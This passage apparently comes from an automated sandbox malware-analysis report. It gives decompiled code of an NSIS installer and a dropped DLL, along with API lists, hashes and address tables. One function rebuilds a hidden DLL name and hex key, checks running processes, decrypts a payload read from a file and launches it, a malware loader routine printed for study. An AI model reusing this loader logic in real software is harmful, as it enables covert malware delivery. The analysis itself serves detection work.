							if(_t62 == 1) {
								 *0x423f08 =  &( *0x423f08->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b50);
								_push(0xfffffffa);
								E00404D7B();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D7B(0xffffffea,  *(_t85 - 8));
				 *0x423f34 =  *0x423f34 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0x34));
				_push( *((intOrPtr*)(_t85 - 0x1c)));
				_t43 = E00402E5B(); // executed
				 *0x423f34 =  *0x423f34 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18);
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004059FF(_t75, _t80, 0x409b50, 0x409b50, 0xffffffee);
					} else {
						E004059FF(_t75, _t80, 0x409b50, 0x409b50, 0xffffffe9);
						lstrcatA(0x409b50,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b50);
					E0040529E();
					goto L29;
				}
				goto L33;
			}
















                                                                                0x00401734
                                                                                0x0040173b
                                                                                0x00401744
                                                                                0x00401747
                                                                                0x0040174a
                                                                                0x0040174f
                                                                                0x00401757
                                                                                0x00401773
                                                                                0x00401759
                                                                                0x00401759
                                                                                0x0040175a
                                                                                0x0040175a
                                                                                0x00401779
                                                                                0x00401783
                                                                                0x00401783
                                                                                0x00401787
                                                                                0x0040178a
                                                                                0x0040178f
                                                                                0x00401791
                                                                                0x00401793
                                                                                0x00401798
                                                                                0x00401798
                                                                                0x004017a3
                                                                                0x004017a3
                                                                                0x004017b4
                                                                                0x004017b6
                                                                                0x004017b6
                                                                                0x004017b7
                                                                                0x004017b7
                                                                                0x004017ba
                                                                                0x004017bd
                                                                                0x004017c0
                                                                                0x004017c0
                                                                                0x004017c7
                                                                                0x004017d6
                                                                                0x004017db
                                                                                0x004017de
                                                                                0x004017e1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004017e3
                                                                                0x004017e6
                                                                                0x00401840
                                                                                0x00401845
                                                                                0x004015a8
                                                                                0x0040265c
                                                                                0x0040265c
                                                                                0x0040288b
                                                                                0x0040288e
                                                                                0x0040288e
                                                                                0x00000000
                                                                                0x004017e8
                                                                                0x004017ee
                                                                                0x004017f9
                                                                                0x00401806
                                                                                0x00401811
                                                                                0x00401827
                                                                                0x00401827
                                                                                0x0040182a
                                                                                0x00000000
                                                                                0x00401830
                                                                                0x00401830
                                                                                0x00401831
                                                                                0x0040184e
                                                                                0x00402894
                                                                                0x00402894
                                                                                0x00402894
                                                                                0x00401833
                                                                                0x00401833
                                                                                0x00401834
                                                                                0x00401492
                                                                                0x0040220e
                                                                                0x0040220e
                                                                                0x0040220e
                                                                                0x00401831
                                                                                0x0040182a
                                                                                0x00402896
                                                                                0x0040289a
                                                                                0x0040289a
                                                                                0x0040185e
                                                                                0x00401863
                                                                                0x00401869
                                                                                0x0040186a
                                                                                0x0040186b
                                                                                0x0040186e
                                                                                0x00401871
                                                                                0x00401876
                                                                                0x0040187c
                                                                                0x00401880
                                                                                0x00401882
                                                                                0x0040188a
                                                                                0x00401896
                                                                                0x00401884
                                                                                0x00401884
                                                                                0x00401888
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401888
                                                                                0x0040189f
                                                                                0x004018a5
                                                                                0x004018a7
                                                                                0x00000000
                                                                                0x004018ad
                                                                                0x004018ad
                                                                                0x004018b0
                                                                                0x004018c8
                                                                                0x004018b2
                                                                                0x004018b5
                                                                                0x004018be
                                                                                0x004018be
                                                                                0x004018cd
                                                                                0x004018d2
                                                                                0x00402209
                                                                                0x00000000
                                                                                0x00402209
                                                                                0x00000000

                                                                                APIs
                                                                                • lstrcatA.KERNEL32(00000000,00000000,Bgcedtxsf,00429800,00000000,00000000,00000031), ref: 00401773
                                                                                • CompareFileTime.KERNEL32(-00000014,?,Bgcedtxsf,Bgcedtxsf,00000000,00000000,Bgcedtxsf,00429800,00000000,00000000,00000031), ref: 0040179D
                                                                                  • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,00423680,NSIS Error), ref: 004059EA
                                                                                  • Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                  • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                  • Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                                                                  • Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                                                                  • Part of subcall function 00404D7B: SendMessageA.USER32 ref: 00404E0F
                                                                                  • Part of subcall function 00404D7B: SendMessageA.USER32 ref: 00404E29
                                                                                  • Part of subcall function 00404D7B: SendMessageA.USER32 ref: 00404E37
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                • String ID: Bgcedtxsf$C:\Users\user\AppData\Local\Temp\nss398D.tmp$C:\Users\user\AppData\Local\Temp\nss398D.tmp\8pspgamerixa.dll
                                                                                • API String ID: 1941528284-307157000
                                                                                • Opcode ID: d1f8f88ddd65081c6307e74da648403d8cdd2e28ccbd234bb8866053e143a7a3
                                                                                • Instruction ID: 320d9b6d43765fc05083a9fb7d2039df1fc59d72a0d4a2cae58aa861ee970b54
                                                                                • Opcode Fuzzy Hash: d1f8f88ddd65081c6307e74da648403d8cdd2e28ccbd234bb8866053e143a7a3
                                                                                • Instruction Fuzzy Hash: 3141E372900615BACF10BBA5DD46EAF3A79EF01329B20433BF515F11E1D63C4A419BAD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402E5B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E00402E5B(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t62;
				void* _t63;
				intOrPtr _t74;
				long _t75;
				int _t78;
				void* _t88;
				void* _t93;
				long _t96;
				signed int _t97;
				long _t98;
				int _t99;
				void* _t100;
				long _t101;
				void* _t102;

				_t97 = _a16;
				_t93 = _a12;
				_v12 = _t97;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t88 = _t93;
				if(_t93 == 0) {
					_t88 = 0x40f020;
				}
				_t60 = _a4;
				if(_a4 >= 0) {
					E00403080( *0x423ed8 + _t60);
				}
				_t62 = E0040304E( &_a16, 4); // executed
				if(_t62 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t98 = _v12;
								if(_a16 < _t98) {
									_t98 = _a16;
								}
								if(E0040304E(0x40b020, _t98) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x40b020, _t98,  &_a12, 0) == 0 || _t98 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t63);
										return _t63;
									} else {
										_v8 = _v8 + _t98;
										_a16 = _a16 - _t98;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t97) {
							_t97 = _a16;
						}
						if(E0040304E(_t93, _t97) != 0) {
							_v8 = _t97;
							goto L45;
						} else {
							goto L34;
						}
					}
					_v16 = GetTickCount();
					E00405DD5(0x40af90);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E0040304E(0x40b020, _t99) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t99;
						 *0x40afa8 = 0x40b020;
						 *0x40afac = _t99;
						while(1) {
							 *0x40afb0 = _t88;
							 *0x40afb4 = _v12; // executed
							_t74 = E00405DF5(0x40af90); // executed
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t100 =  *0x40afb0; // 0x40f020
							_t101 = _t100 - _t88;
							_t75 = GetTickCount();
							_t96 = _t75;
							if(( *0x423f34 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404D7B(0,  &_v88);
								_v16 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_t88 =  *0x40afb0; // 0x40f020
									L24:
									if(_v24 != 1) {
										continue;
									}
									goto L45;
								}
								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
								if(_t78 == 0 || _v20 != _t101) {
									goto L29;
								} else {
									_v8 = _v8 + _t101;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}























                                                                                0x00402e63
                                                                                0x00402e67
                                                                                0x00402e6a
                                                                                0x00402e6f
                                                                                0x00402e71
                                                                                0x00402e71
                                                                                0x00402e78
                                                                                0x00402e7c
                                                                                0x00402e80
                                                                                0x00402e82
                                                                                0x00402e82
                                                                                0x00402e87
                                                                                0x00402e8c
                                                                                0x00402e97
                                                                                0x00402e97
                                                                                0x00402ea2
                                                                                0x00402ea9
                                                                                0x00402ff9
                                                                                0x00402ff9
                                                                                0x00000000
                                                                                0x00402eaf
                                                                                0x00402eb3
                                                                                0x00402fe4
                                                                                0x00403039
                                                                                0x00402ffe
                                                                                0x00403004
                                                                                0x00403006
                                                                                0x00403006
                                                                                0x00403017
                                                                                0x00000000
                                                                                0x00403019
                                                                                0x0040302c
                                                                                0x00402fde
                                                                                0x00402fde
                                                                                0x00402ffb
                                                                                0x00402ffb
                                                                                0x00000000
                                                                                0x00403033
                                                                                0x00403033
                                                                                0x00403036
                                                                                0x00000000
                                                                                0x00403036
                                                                                0x0040302c
                                                                                0x00403017
                                                                                0x00403044
                                                                                0x00000000
                                                                                0x00403044
                                                                                0x00402fe9
                                                                                0x00402feb
                                                                                0x00402feb
                                                                                0x00402ff7
                                                                                0x00403041
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402ff7
                                                                                0x00402ec4
                                                                                0x00402ec7
                                                                                0x00402ecc
                                                                                0x00402ecc
                                                                                0x00402ed6
                                                                                0x00402ed9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402edf
                                                                                0x00402edf
                                                                                0x00402edf
                                                                                0x00402ee7
                                                                                0x00402ee9
                                                                                0x00402ee9
                                                                                0x00402efa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402f00
                                                                                0x00402f03
                                                                                0x00402f09
                                                                                0x00402f0f
                                                                                0x00402f17
                                                                                0x00402f1d
                                                                                0x00402f22
                                                                                0x00402f29
                                                                                0x00402f2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402f32
                                                                                0x00402f38
                                                                                0x00402f3a
                                                                                0x00402f47
                                                                                0x00402f49
                                                                                0x00402f77
                                                                                0x00402f7d
                                                                                0x00402f86
                                                                                0x00402f8b
                                                                                0x00402f8b
                                                                                0x00402f92
                                                                                0x00402fd2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402f94
                                                                                0x00402f97
                                                                                0x00402fb7
                                                                                0x00402fba
                                                                                0x00402fbd
                                                                                0x00402fc3
                                                                                0x00402fc7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402fcd
                                                                                0x00402fa3
                                                                                0x00402fab
                                                                                0x00000000
                                                                                0x00402fb2
                                                                                0x00402fb2
                                                                                0x00000000
                                                                                0x00402fb2
                                                                                0x00402fab
                                                                                0x00402f92
                                                                                0x00402fda
                                                                                0x00000000
                                                                                0x00402fda
                                                                                0x00000000
                                                                                0x00402edf

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402EB9
                                                                                • GetTickCount.KERNEL32 ref: 00402F3A
                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F67
                                                                                • wsprintfA.USER32 ref: 00402F77
                                                                                • WriteFile.KERNELBASE(00000000,00000000,0040F020,00000000,00000000), ref: 00402FA3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CountTick$FileWritewsprintf
                                                                                • String ID: ... %d%%
                                                                                • API String ID: 4209647438-2449383134
                                                                                • Opcode ID: c216618446190a79faaa043376a0a4938ac424442187e55e5d7ef74b641ab517
                                                                                • Instruction ID: 2ea9a6d4f593b228b48d69dcca85b183c8746c3187ecfee997accf3c3472ebe5
                                                                                • Opcode Fuzzy Hash: c216618446190a79faaa043376a0a4938ac424442187e55e5d7ef74b641ab517
                                                                                • Instruction Fuzzy Hash: 8F51917190121A9BDF10CF55DA48AAF7B78AF047A5F10413BF810B72C4D7789E50DBAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 100052E4, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 306filememoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 74%
                                                                                			E100052E4(void* __eflags) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				short _v108;
				short _v110;
				short _v112;
				short _v114;
				short _v116;
				short _v118;
				short _v120;
				short _v122;
				char _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				long _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v200;
				char _v268;
				char _v1308;
				short _t171;
				short _t172;
				short _t173;
				short _t174;
				short _t175;
				short _t176;
				short _t177;
				short _t178;
				short _t179;
				short _t180;
				short _t181;
				short _t182;
				short _t183;
				short _t184;
				short _t185;
				short _t186;
				signed int _t200;
				void* _t202;
				void* _t208;
				signed int _t209;
				void* _t210;
				int _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t240;
				signed int _t242;
				signed int _t243;
				void* _t245;
				signed int _t246;
				void* _t248;
				signed int _t249;
				void* _t251;
				void* _t257;
				void* _t258;

				_t258 = __eflags;
				_v24 = _v24 & 0x00000000;
				_v140 = _v140 & 0x00000000;
				_v72 = 0x64;
				_v71 = 0x66;
				_v70 = 0x61;
				_v69 = 0x37;
				_v68 = 0x30;
				_v67 = 0x35;
				_v66 = 0x30;
				_v65 = 0x64;
				_v64 = 0x66;
				_v63 = 0x63;
				_v62 = 0x38;
				_v61 = 0x66;
				_v60 = 0x34;
				_v59 = 0x30;
				_v58 = 0x63;
				_v57 = 0x33;
				_v56 = 0x38;
				_v55 = 0x62;
				_v54 = 0x32;
				_v53 = 0x38;
				_v52 = 0x34;
				_v51 = 0x31;
				_v50 = 0x34;
				_v49 = 0x65;
				_v48 = 0x38;
				_v47 = 0x39;
				_v46 = 0x36;
				_v45 = 0x31;
				_v44 = 0x63;
				_v43 = 0x35;
				_v42 = 0x34;
				_v41 = 0x30;
				_v40 = 0;
				_v16 = _v16 & 0x00000000;
				_v76 = _v76 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_t171 = 0x38;
				_v124 = _t171;
				_t172 = 0x70;
				_v122 = _t172;
				_t173 = 0x73;
				_v120 = _t173;
				_t174 = 0x70;
				_v118 = _t174;
				_t175 = 0x67;
				_v116 = _t175;
				_t176 = 0x61;
				_v114 = _t176;
				_t177 = 0x6d;
				_v112 = _t177;
				_t178 = 0x65;
				_v110 = _t178;
				_t179 = 0x72;
				_v108 = _t179;
				_t180 = 0x69;
				_v106 = _t180;
				_t181 = 0x78;
				_v104 = _t181;
				_t182 = 0x61;
				_v102 = _t182;
				_t183 = 0x2e;
				_v100 = _t183;
				_t184 = 0x64;
				_v98 = _t184;
				_t185 = 0x6c;
				_v96 = _t185;
				_t186 = 0x6c;
				_v94 = _t186;
				_v92 = 0;
				_v8 = E100056FB();
				_v84 = E100057A3(_v8, 0x34cf0bf);
				_v88 = E100057A3(_v8, 0x55e38b1f);
				_v128 = E100057A3(_v8, 0xd1775dc4);
				_v180 = E100057A3(_v8, 0xd6eb2188);
				_v160 = E100057A3(_v8, 0xa2eae210);
				_v184 = E100057A3(_v8, 0xcd8538b2);
				_v132 = E100057A3(_v8, 0x8a111d91);
				_v136 = E100057A3(_v8, 0x170c1ca1);
				_v80 = E100057A3(_v8, 0xa5f15738);
				_v144 = E100057A3(_v8, 0x433a3842);
				_v156 = E100057A3(_v8, 0x2ffe2c64);
				_v176 = 0x2d734193;
				_v172 = 0x63daa681;
				_v168 = 0x26090612;
				_v164 = 0x6f28fae0;
				_t200 = 4;
				_t202 = E10005241(_t258,  *((intOrPtr*)(_t257 + _t200 * 0 - 0xac))); // executed
				_t259 = _t202;
				if(_t202 != 0) {
					L4:
					_v84(0x7918);
					L5:
					_v128(0,  &_v1308, 0x103);
					_t208 = CreateFileW(E100058FE(_t262,  &_v124), 0x80000000, 7, 0, 3, 0x80, 0);
					_v24 = _t208;
					if(_v24 != 0xffffffff) {
						_t209 = _v136(_v24, 0);
						_v16 = _t209;
						__eflags = _v16 - 0xffffffff;
						if(_v16 != 0xffffffff) {
							_t210 = VirtualAlloc(0, _v16, 0x3000, 4);
							_v12 = _t210;
							__eflags = _v12;
							if(_v12 != 0) {
								_t212 = ReadFile(_v24, _v12, _v16,  &_v140, 0);
								__eflags = _t212;
								if(_t212 != 0) {
									_v148 = _v12;
									_v28 = _v12 +  *((intOrPtr*)(_v148 + 0x3c));
									_t254 = _v28;
									_v152 = _v28 + ( *(_v28 + 0x14) & 0x0000ffff) + 0x18;
									_v20 =  *((intOrPtr*)(_v28 + 0x54));
									_v32 = _v32 & 0x00000000;
									while(1) {
										_t220 = _v28;
										__eflags = _v32 - ( *(_t220 + 6) & 0x0000ffff);
										if(_v32 >= ( *(_t220 + 6) & 0x0000ffff)) {
											break;
										}
										_t240 = _v32 * 0x28;
										_t254 = _v152;
										_t255 = _v20 +  *((intOrPtr*)(_t254 + _t240 + 0x10));
										_v20 = _v20 +  *((intOrPtr*)(_t254 + _t240 + 0x10));
										_t242 = _v32 + 1;
										__eflags = _t242;
										_v32 = _t242;
									}
									_v76 = _v16 - _v20;
									_v36 = VirtualAlloc(0, _v76, 0x3000, 4);
									E10005713(_t254, _v36, _v12 + _v20, _v76);
									_t158 =  &_v72; // 0x64
									E10005045(_v36, _t158, 0x20);
									_t230 = E10004064(_t254, _t255, __eflags, _v36); // executed
									__eflags = _t230;
									if(_t230 != 0) {
										_v84(0xbb8);
										E10004035(_t254,  &_v200, 0x10);
										E10004035(_t254,  &_v268, 0x44);
										_t230 = _v160( &_v1308, _v156(0, 0, 0, 0x20, 0, 0,  &_v268,  &_v200));
										__eflags = _t230;
										if(_t230 != 0) {
											_t230 = _v88(0);
										}
									}
									ExitProcess(0);
								}
								return _t212;
							}
							return _t210;
						}
						return _t209;
					}
					return _t208;
				}
				_t243 = 4;
				_t245 = E10005241(_t259,  *((intOrPtr*)(_t257 + (_t243 << 0) - 0xac))); // executed
				_t260 = _t245;
				if(_t245 != 0) {
					goto L4;
				}
				_t246 = 4;
				_t248 = E10005241(_t260,  *((intOrPtr*)(_t257 + (_t246 << 1) - 0xac))); // executed
				_t261 = _t248;
				if(_t248 != 0) {
					goto L4;
				}
				_t249 = 4;
				_t251 = E10005241(_t261,  *((intOrPtr*)(_t257 + _t249 * 3 - 0xac))); // executed
				_t262 = _t251;
				if(_t251 == 0) {
					goto L5;
				}
				goto L4;
			}





















































































































                                                                                0x100052e4
                                                                                0x100052ed
                                                                                0x100052f1
                                                                                0x100052f8
                                                                                0x100052fc
                                                                                0x10005300
                                                                                0x10005304
                                                                                0x10005308
                                                                                0x1000530c
                                                                                0x10005310
                                                                                0x10005314
                                                                                0x10005318
                                                                                0x1000531c
                                                                                0x10005320
                                                                                0x10005324
                                                                                0x10005328
                                                                                0x1000532c
                                                                                0x10005330
                                                                                0x10005334
                                                                                0x10005338
                                                                                0x1000533c
                                                                                0x10005340
                                                                                0x10005344
                                                                                0x10005348
                                                                                0x1000534c
                                                                                0x10005350
                                                                                0x10005354
                                                                                0x10005358
                                                                                0x1000535c
                                                                                0x10005360
                                                                                0x10005364
                                                                                0x10005368
                                                                                0x1000536c
                                                                                0x10005370
                                                                                0x10005374
                                                                                0x10005378
                                                                                0x1000537c
                                                                                0x10005380
                                                                                0x10005384
                                                                                0x10005388
                                                                                0x1000538c
                                                                                0x10005392
                                                                                0x10005393
                                                                                0x10005399
                                                                                0x1000539a
                                                                                0x100053a0
                                                                                0x100053a1
                                                                                0x100053a7
                                                                                0x100053a8
                                                                                0x100053ae
                                                                                0x100053af
                                                                                0x100053b5
                                                                                0x100053b6
                                                                                0x100053bc
                                                                                0x100053bd
                                                                                0x100053c3
                                                                                0x100053c4
                                                                                0x100053ca
                                                                                0x100053cb
                                                                                0x100053d1
                                                                                0x100053d2
                                                                                0x100053d8
                                                                                0x100053d9
                                                                                0x100053df
                                                                                0x100053e0
                                                                                0x100053e6
                                                                                0x100053e7
                                                                                0x100053ed
                                                                                0x100053ee
                                                                                0x100053f4
                                                                                0x100053f5
                                                                                0x100053fb
                                                                                0x100053fc
                                                                                0x10005402
                                                                                0x1000540b
                                                                                0x1000541b
                                                                                0x1000542b
                                                                                0x1000543b
                                                                                0x1000544b
                                                                                0x1000545e
                                                                                0x10005471
                                                                                0x10005484
                                                                                0x10005494
                                                                                0x100054a7
                                                                                0x100054b7
                                                                                0x100054ca
                                                                                0x100054d0
                                                                                0x100054da
                                                                                0x100054e4
                                                                                0x100054ee
                                                                                0x100054fa
                                                                                0x10005505
                                                                                0x1000550a
                                                                                0x1000550c
                                                                                0x1000554f
                                                                                0x10005554
                                                                                0x10005557
                                                                                0x10005565
                                                                                0x10005584
                                                                                0x10005587
                                                                                0x1000558e
                                                                                0x1000559a
                                                                                0x100055a0
                                                                                0x100055a3
                                                                                0x100055a7
                                                                                0x100055ba
                                                                                0x100055bd
                                                                                0x100055c0
                                                                                0x100055c4
                                                                                0x100055dd
                                                                                0x100055e3
                                                                                0x100055e5
                                                                                0x100055ef
                                                                                0x10005601
                                                                                0x1000560b
                                                                                0x10005612
                                                                                0x1000561e
                                                                                0x10005621
                                                                                0x1000562e
                                                                                0x1000562e
                                                                                0x10005635
                                                                                0x10005638
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x1000563a
                                                                                0x1000563e
                                                                                0x10005647
                                                                                0x1000564b
                                                                                0x1000562a
                                                                                0x1000562a
                                                                                0x1000562b
                                                                                0x1000562b
                                                                                0x10005656
                                                                                0x10005668
                                                                                0x10005678
                                                                                0x1000567f
                                                                                0x10005686
                                                                                0x1000568e
                                                                                0x10005693
                                                                                0x10005695
                                                                                0x1000569c
                                                                                0x100056a8
                                                                                0x100056b6
                                                                                0x100056e3
                                                                                0x100056e9
                                                                                0x100056eb
                                                                                0x100056ef
                                                                                0x100056ef
                                                                                0x100056eb
                                                                                0x100056f4
                                                                                0x100056f4
                                                                                0x00000000
                                                                                0x100055e5
                                                                                0x00000000
                                                                                0x100055c4
                                                                                0x00000000
                                                                                0x100055a7
                                                                                0x00000000
                                                                                0x1000558e
                                                                                0x10005510
                                                                                0x1000551b
                                                                                0x10005520
                                                                                0x10005522
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x10005526
                                                                                0x10005530
                                                                                0x10005535
                                                                                0x10005537
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x1000553b
                                                                                0x10005546
                                                                                0x1000554b
                                                                                0x1000554d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 10005241: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 10005286
                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 10005584
                                                                                  • Part of subcall function 10005241: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 100052AA
                                                                                • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 100055BA
                                                                                  • Part of subcall function 10005241: Process32NextW.KERNEL32(000000FF,0000022C), ref: 100052D5
                                                                                • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 100055DD
                                                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 10005665
                                                                                • ExitProcess.KERNEL32(00000000,00000000,00000000,00000000), ref: 100056F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.235807350.0000000010004000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.235775448.0000000010000000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235794772.0000000010001000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235800984.0000000010003000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235820043.0000000010006000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AllocCreateFileProcess32Virtual$ExitFirstNextProcessReadSnapshotToolhelp32
                                                                                • String ID: dfa7050dfc8f40c38b28414e8961c540
                                                                                • API String ID: 3683539093-3439124008
                                                                                • Opcode ID: 1989c8ba980e4208d1cbee3340af1e5ccd4d42b5d133ad32d6f10d6c3711536f
                                                                                • Instruction ID: 699ecdbace2bcf3288d331bd9218f11b01f90a6da27f1451cf2ff93dc4702d4c
                                                                                • Opcode Fuzzy Hash: 1989c8ba980e4208d1cbee3340af1e5ccd4d42b5d133ad32d6f10d6c3711536f
                                                                                • Instruction Fuzzy Hash: 9AD17974D04388EEEF11CBA4DC46BEEBBB5EF04745F10409AE604BA291D7B61A84DF25
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 1000472B, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 69%
                                                                                			E1000472B(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
